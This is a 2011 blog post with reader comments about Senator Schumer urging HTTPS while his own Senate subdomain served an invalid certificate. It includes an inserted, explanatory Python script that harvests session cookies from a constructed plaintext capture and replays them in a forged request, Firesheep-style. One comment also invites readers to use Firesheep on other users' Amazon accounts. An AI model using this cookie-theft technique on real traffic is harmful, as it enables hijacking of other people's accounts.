Senator Schumer Fails To Properly Use HTTPS On His Own Site, After Pushing Other Sites To Use It [Updated]

from the ooooops dept

This is just lovely. We just wrote about how Senator Chuck Schumer was pressuring websites to use https instead of http, saying (not really accurately) that http has a "security flaw." However, gojomo pointed out in a comment on that post that Schumer's own page, when you load it over HTTPS at https://schumer.senate.gov/, reports:
"schumer.senate.gov uses an invalid security certificate."

Ooops. Both Firefox and Chrome warn you not to proceed, because the connection is "untrusted" or the site "might not be the site you are looking for." That warning means the server presented a certificate the browser cannot tie to the name schumer.senate.gov, so it has no way to confirm who is on the other end of the connection, which is exactly the assurance HTTPS is supposed to provide. This is probably just a small technical error by Schumer's tech staff, but it does look pretty bad when he's out there grandstanding on https. Of course, this isn't to diminish that https is a useful tool that many websites should use to protect users, but it's not clear that we want politicians telling websites what protocols to use (especially when they haven't quite figured them out themselves).

Update: Some great points in the comments highlighting that Schumer and his staff don't control the tech behind his Senate website; any such cert would have to be issued and installed by the Senate IT folks. They also pointed out that Schumer's Senate site does not appear to take user info or logins, so there is no session for an eavesdropper to steal and HTTPS wouldn't much matter there (it would still stop a network attacker from tampering with the page in transit, but that is a different concern). However, his personal/campaign site does appear to take info and also does not use HTTPS.

Separately, others pointed out that one of the sites he called out -- Amazon -- does use HTTPS when you log in and/or order, and his calling them out suggests they're unsafe when it appears they are safe. One caveat raised later in the comments: HTTPS on the login and checkout pages alone protects the password and card number, not the session cookie that the browser then sends in the clear on every plain-HTTP page view, which is exactly what a sniffer on an open wifi network picks up.


Reader Comments


    Lobo Santo (profile), Mar 1st, 2011 @ 1:46pm

    On the other hand

    Perhaps he's attempting to demonstrate how difficult https is to implement, and will next be grandstanding about a better, faster, more secure, easier to implement method of connecting to web pages.

     


      lux (profile), Mar 1st, 2011 @ 2:35pm

      Re: On the other hand

      "Perhaps he's attempting to demonstrate how difficult https is to implement"

      Er, you're joking? Either get a signed cert from a CA or create your own - either way, certs aren't too difficult to maintain/implement.

       


    Anonymous Coward, Mar 1st, 2011 @ 1:47pm

    You don't have permission to access / on this server.

    There isn't anything on the secure server. It's a dead address. His site isn't "secure" in that manner, so it isn't surprising it doesn't work.

    That and the fact that the certificate would be controlled by senate.gov, and not the senator or his staff.

     


      Mike Masnick (profile), Mar 1st, 2011 @ 2:38pm

      Re:

      That and the fact that the certificate would be controlled by senate.gov, and not the senator or his staff.


      That's a good point -- though, again seems to highlight the problem of him telling private companies that they have to do this, right?

       


        Anonymous Coward, Mar 1st, 2011 @ 2:50pm

        Re: Re:

        HTTPS is not security anyway. It's a false sense of security. Ask the OpenBSD people, they'll lecture you about it. There's still ways "around" it, and/or if you hack your way into the machine to replace it, etc...

        It's like putting an electronic lock on your car.. it might help if you lose the key, but down the line, someone can still steal your car with fairly low-tech tools.

         


        Anonymous Coward, Mar 1st, 2011 @ 7:41pm

        Re: Re:

        Not really. senate.gov's certificate gets pulled when you pull any third level (there is that pesky reason why third levels are not the same). So you can https any of the individual sites, and get the same reaction. It's as much a browser fault as anything else. I don't think that Mr Schumer had any https site specifically set up.

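The mismatch described in the comments above, as an added example (not code from the original page, from senate.gov, or from any of the commenters): a browser compares the name it was asked for against the names inside the certificate it received, and a certificate issued for senate.gov does not cover schumer.senate.gov. The certificate contents below are constructed stand-ins in the dict shape Python's `ssl.SSLSocket.getpeercert()` returns, following the comment's claim that the parent domain's certificate was being served; the matching rules are a simplified version of what browsers apply (subjectAltName first, commonName only as a fallback, a wildcard only as the whole leftmost label and only matching one label).

```python
"""Certificate hostname matching, the check behind "uses an invalid security certificate".

Added illustration; the certificate dicts are constructed stand-ins, in the shape
Python's ssl.SSLSocket.getpeercert() returns, not the real senate.gov certificate.
"""


def dns_names(cert: dict) -> list:
    """Names the certificate claims: subjectAltName dNSName entries, else the CN."""
    names = [value for kind, value in cert.get("subjectAltName", ()) if kind == "DNS"]
    if names:
        return names
    for rdn in cert.get("subject", ()):
        for key, value in rdn:
            if key == "commonName":
                return [value]
    return []


def name_matches(pattern: str, hostname: str) -> bool:
    """Simplified RFC 6125 matching: case-insensitive, wildcard only as the whole
    leftmost label, matching exactly one label, and never on a two-label name."""
    pattern = pattern.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    if "*" not in pattern:
        return pattern == hostname
    p_labels, h_labels = pattern.split("."), hostname.split(".")
    if p_labels[0] != "*" or len(p_labels) < 3:
        return False  # "f*.senate.gov" and "*.gov" are rejected outright
    return len(p_labels) == len(h_labels) and p_labels[1:] == h_labels[1:]


def match_hostname(cert: dict, hostname: str) -> bool:
    """True if any name in the certificate covers the hostname the browser asked for."""
    return any(name_matches(name, hostname) for name in dns_names(cert))


def explain(cert: dict, hostname: str) -> str:
    """The sentence a browser interstitial boils down to."""
    names = ", ".join(dns_names(cert))
    if match_hostname(cert, hostname):
        return f"{hostname}: certificate valid for {names}; name matches"
    return f"{hostname}: certificate is only valid for {names}; name does not match"


# Constructed, after the comment above: the senate.gov front end presenting the
# parent domain's certificate to a browser that asked for schumer.senate.gov.
SENATE_CERT = {
    "subject": ((("commonName", "senate.gov"),),),
    "subjectAltName": (("DNS", "senate.gov"), ("DNS", "www.senate.gov")),
}
# Constructed: the wildcard certificate Jon B. mentions the Senate could have used.
WILDCARD_CERT = {
    "subject": ((("commonName", "*.senate.gov"),),),
    "subjectAltName": (("DNS", "*.senate.gov"), ("DNS", "senate.gov")),
}

if __name__ == "__main__":
    for cert in (SENATE_CERT, WILDCARD_CERT):
        for host in ("schumer.senate.gov", "www.senate.gov", "senate.gov", "www.schumer.senate.gov"):
            print(explain(cert, host))
```

The wildcard certificate satisfies the check for every office subdomain, which is why it comes up in the thread; the reason to hesitate is that its one private key then has to live on every server that answers for any senate.gov name, so a compromise of any of them lets the attacker impersonate all of them.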

    Jon B., Mar 1st, 2011 @ 2:03pm

    Right, I'm pretty sure his staff doesn't control senate.gov, and as such wouldn't be able (unilaterally, anyway) to set up a cert for schumer.senate.gov. And it's not like someone linked to https://schumer.senate.gov - some guy just went and tried to access it in response to the article from earlier this morning. It's no surprise at all the server isn't configured to serve individual officials' subdomains as HTTPS. They *could* get a *.senate.gov cert, but there's good reasons not to do that, too.

    I'm not a fan of the guy but I don't know why we're giving him grief over something he can't control. It's apparently based on him 'recommending' something and therefore might speculatively push for legislation in some regard. I dunno. Maybe I missed something.


      weneedhelp (profile), Mar 1st, 2011 @ 2:11pm

      Re: Maybe I missed something

      "him 'recommending' something and therefore might speculatively push"

      That's the problem, so many politicians recommend stuff without actually understanding how it works.

       


    Anonymous Coward, Mar 1st, 2011 @ 2:05pm

    Lame Story...nothing to see here

     


    Drew (profile), Mar 1st, 2011 @ 2:08pm

    So what?

    Why the hell are you railing against someone making a REALLY good point? Sure his implementation was poor, but what's the point in ripping him for "grandstanding" and then claiming that politicians should be "telling websites what protocol to use?"

    I mean, he's right. Stop trying to gin up controversy.

     


      Stuart, Mar 1st, 2011 @ 3:00pm

      Re: So what?

      A really good point is one thing. A government telling everyone how to do shit with new laws is something else altogether.

       


        Drew (profile), Mar 1st, 2011 @ 3:23pm

        Re: Re: So what?

        There doesn't appear to be any such law proposed. For the time being, it sounds like this is just a politician supporting a good idea.

         


    blah, Mar 1st, 2011 @ 2:18pm

    https is broken

    Rather than promoting https as the way to solve security problems (really, I would promote it as a way to help solve privacy issues, tbh) - perhaps we should actually fix it first.

    https and SSL are a great way for a small number of Certificate Authority companies to make a boatload of cash for doing very little. I wouldn't be surprised if Verisign approached this guy and lobbied for this.

     


    Jeff Kim, Mar 1st, 2011 @ 2:20pm

    CDNetworks provides last mile HTTPS feature

    CDNetworks protects its customers from the Firesheep security threat with a "last-mile-secure" feature within its Content Acceleration SSL product. This innovative solution requires no changes to the websites of CDNetworks' customers. Instead, CDNetworks communicates with websites in clear HTTP, and then transforms their responses to end users via SSL over HTTPS. This renders the Firesheep plug-in completely ineffective. http://www.businesswire.com/news/home/20101104005744/en/CDNetworks-Protects-Firesheep-Last-Mile-Secure-Feature


    Dean Landolt, Mar 1st, 2011 @ 2:22pm

    Mike, I love you man, but you're really out of your element here. It's already been pointed out how Schumer's staff wouldn't control the cert, and that it's a dead endpoint anyway, and that (surprisingly!) the senator is actually *correct*...

    But more importantly: if you understood the attack vector in question you'd understand that it is only really relevant for hijacking user sessions in progress. If you'd looked at the port 80 version of the site you may notice the lack of a login feature anywhere, thus your complaint is completely baseless. In this case you're the one doing the grandstanding.

     


    Anonymous Coward, Mar 1st, 2011 @ 2:45pm

    Firefox can't find the server at schumer.senate.gov.

    $ host schumer.senate.gov
    ;; connection timed out; no servers could be reached

    Fail.

     


      Anonymous Coward, Mar 1st, 2011 @ 2:46pm

      Re:

      $ dig @sen-dmzp.senate.gov schumer.senate.gov
      dig: couldn't get address for 'sen-dmzp.senate.gov': not found

      Fail...er.

       


    iamtheky (profile), Mar 1st, 2011 @ 2:49pm

    "(especially when they haven't quite figured them out themselves)"

    is a fitting way to end a post that is also not too keen on the way the internet works. But it's just small technical errors on your staff's part, but it does look pretty bad when you are out there grandstanding about grandstanding.


    Steven (profile), Mar 1st, 2011 @ 2:49pm

    This is why I love Techdirt

    This is one of the reasons I love this site. In no time at all the commenters have basically nailed Mike on several different points and added much more information to the story. The folks here don't seem to have much of a 'follow whatever Mike says' tendency.

    While I don't think this is really a story I do think this is an anecdotal situation of a much larger problem. Politicians just deciding to get involved in situations the government has no reason to be in.

     


    JH, Mar 1st, 2011 @ 2:56pm

    Since there aren't any forms on Schumer's site that prompt users for personal info AFAICT, HTTPS doesn't really seem necessary to me.

    What does bother me about this is it seems like defamation for Schumer to call out Amazon specifically when Amazon already uses HTTPS for sign-in and checkout. People who don't know the details of SSL are going to hear this and think they aren't safe shopping on/signing into Amazon at all. This could boil down to a loss of business for Amazon if people take this as "Amazon is insecure". I'm not sure what else Schumer wants from Amazon. Does he want browsing of the site to be done through HTTPS as well? If so then Mike is correct, Schumer's site should be protected by HTTPS too. If he's really concerned about HTTPS he could redirect http://schumer.senate.gov (which others have pointed out he most likely has no control over) to https://chuckschumer.com/ (which I'm sure he has control over)

    Actually...looking at chuckschumer.com there is a place to submit your email address and zip code, and there is no secure option...

     


    addie, Mar 1st, 2011 @ 3:51pm

    https is misunderstood

    Https is for encrypting the connection between the browser and the remote server. Https is not for authentication, as much as the cert authorities want you to confuse the two. There is a tor person blog post about life without a CA that highlights this fact.

     


      mirradric, Mar 1st, 2011 @ 9:20pm

      Re: https is misunderstood

      Actually, https IS used for authentication and this authentication is in fact a very important part of https. The catch is that the party being authenticated is the web server, rather than the client/end user, by way of its certificate.
      This is a very important step in preventing man-in-the-middle attacks. After all, if you have been talking to the wrong party to begin with, no amount of encryption will help you.
      This authentication is supposed to be provided by the certificate authorities, which sign the individual server certificates to create a "web of trust". Of course, there are other ways to determine that certificates (like self-signed ones) are valid (like issuing your own certificate authority cert, comparing fingerprints, etc.). If such arrangements for verifying the certificate are in place, using the certificate is perfectly safe, even if it is self-signed or details such as domain name are wrong.


    Thomas (profile), Mar 1st, 2011 @ 4:48pm

    I'm surprised..

    that a Senator would even know what "https" stands for, much less what it's used for or how it works.

     


    Ray Trygstad (profile), Mar 1st, 2011 @ 11:07pm

    Federal Certificate Authorities

    The federal government maintains an entire infrastructure of their own Certificate Authorities, none of which are recognized by the folks who make the browsers. As a retired Naval Officer, I access DOD sites all the time and find that my browser is constantly warning me about these sites. One time I attempted to download and install certificates for all of the DOD CAs but locating them all, downloading them and installing them took me about two hours and I swore I'd never do it again.

     


    known coward, Mar 2nd, 2011 @ 12:47pm

    you all are way overthinking this one.

    Simple answer:

    Schumer is a grandstanding idiot.

     


    Dean Landolt, Mar 3rd, 2011 @ 1:45pm

    Mike

    I'm glad to see you updated the article -- but the update is *still* inaccurate. I probably should have been more clear about this in my first comment -- the problem isn't whether sites use SSL during the login or payment phases (this has been considered a best practice for years now). You've got to use SSL for the lifetime of the session, at the _very_ least for users on unencrypted wifi where MITM attacks have been made so very easy by tools like firesheep.

    Since there's no way to know which users are on coffee shop wifi it is now considered a best practice to push everyone to SSL. If you don't believe me download firesheep and see what you can get away with on another user's amazon account. You may not be able to buy anything but you'll be able to do quite a bit of damage.

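The attack Dean Landolt describes, as an added illustration that is not part of the original post or of any comment: a Firesheep-style tool does nothing more than read the Cookie headers out of plaintext HTTP requests on the shared network and replay them, so a session that was established over HTTPS is stolen the moment the browser sends its cookie over plain HTTP. The second half shows the one cookie attribute that decides whether a session cookie ever crosses the wire in the clear. The captured traffic is constructed, not real, and example-shop.test and the cookie names are made up.

```python
"""Firesheep-style session sidejacking and the cookie attribute that defeats it.

Added illustration; CAPTURE is a constructed packet capture, not real traffic,
and example-shop.test is a made-up host.
"""
import re

REQUEST_LINE = re.compile(rb"^(GET|POST|PUT|DELETE|HEAD) (\S+) HTTP/1\.[01]$")

# Constructed capture: what a sniffer on open wifi sees after the victim logged
# in over HTTPS and then kept browsing the same site over plain HTTP.
CAPTURE = b"\r\n".join([
    b"GET /account/orders HTTP/1.1",
    b"Host: www.example-shop.test",
    b"Cookie: session-id=145-2207459-9863251; session-token=QmFzZTY0bG9va2luZw; ubid=019-1234",
    b"",
    b"GET /css/site.css HTTP/1.1",
    b"Host: static.example-shop.test",
    b"",
    b"POST /search HTTP/1.1",
    b"Host: www.example-shop.test",
    b"Cookie: session-id=145-2207459-9863251",
    b"Content-Length: 7",
    b"",
    b"q=books",
])


def harvest_sessions(capture: bytes) -> dict:
    """Map each Host seen in plaintext requests to the cookies sent to it.

    This is the whole of the attack: no exploit, no password, just the cookies
    the browser volunteers on every http:// request for as long as the session
    lives. (Request bodies are skipped only because they never start with a
    header name in this capture; a real sniffer would honour Content-Length.)
    """
    sessions: dict = {}
    host, cookies = None, {}
    for line in capture.split(b"\r\n"):
        if REQUEST_LINE.match(line):  # a new request: commit the previous one
            if host and cookies:
                sessions.setdefault(host, {}).update(cookies)
            host, cookies = None, {}
        elif line.lower().startswith(b"host:"):
            host = line.split(b":", 1)[1].strip().decode()
        elif line.lower().startswith(b"cookie:"):
            for pair in line.split(b":", 1)[1].decode().split(";"):
                name, _, value = pair.strip().partition("=")
                if name:
                    cookies[name] = value
    if host and cookies:
        sessions.setdefault(host, {}).update(cookies)
    return sessions


def forge_request(host: str, path: str, cookies: dict) -> bytes:
    """Replay the stolen cookies; the server cannot tell this from the victim's browser."""
    cookie_header = "; ".join(f"{k}={v}" for k, v in cookies.items())
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie_header}\r\n\r\n".encode()


def browser_sends_cookie(set_cookie: str, scheme: str) -> bool:
    """Would a browser attach the cookie from this Set-Cookie header to a request over `scheme`?

    Only the Secure attribute matters here: a Secure cookie is never sent over
    http://, so the plaintext side of the site never carries it.
    """
    attributes = [a.strip().lower() for a in set_cookie.split(";")[1:]]
    return scheme == "https" or "secure" not in attributes


def session_exposed(set_cookie: str, request_schemes) -> bool:
    """True if any request in the session would carry the cookie in cleartext.

    Encrypting only the login page leaves the cookie exposed on every later
    http:// request; marking it Secure means the site must serve the whole
    session over https, or the user simply appears logged out.
    """
    return any(s == "http" and browser_sends_cookie(set_cookie, s) for s in request_schemes)


if __name__ == "__main__":
    stolen = harvest_sessions(CAPTURE)
    for host, cookies in stolen.items():
        print(host, "->", cookies)
    print(forge_request("www.example-shop.test", "/account/orders",
                        stolen["www.example-shop.test"]).decode())
    login_only = "session-id=145-2207459-9863251; Path=/; HttpOnly"
    print("HTTPS login, rest over HTTP, cookie exposed:",
          session_exposed(login_only, ["https", "http", "http"]))
    print("same site with a Secure cookie, cookie exposed:",
          session_exposed(login_only + "; Secure", ["https", "http", "http"]))
```

Note what the Secure attribute does and does not buy: it keeps the cookie off the plaintext path, but a site that still serves pages over http:// then has to cope with a browser that no longer presents the session, which in practice means moving the whole session to HTTPS, which is the point of the comment.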

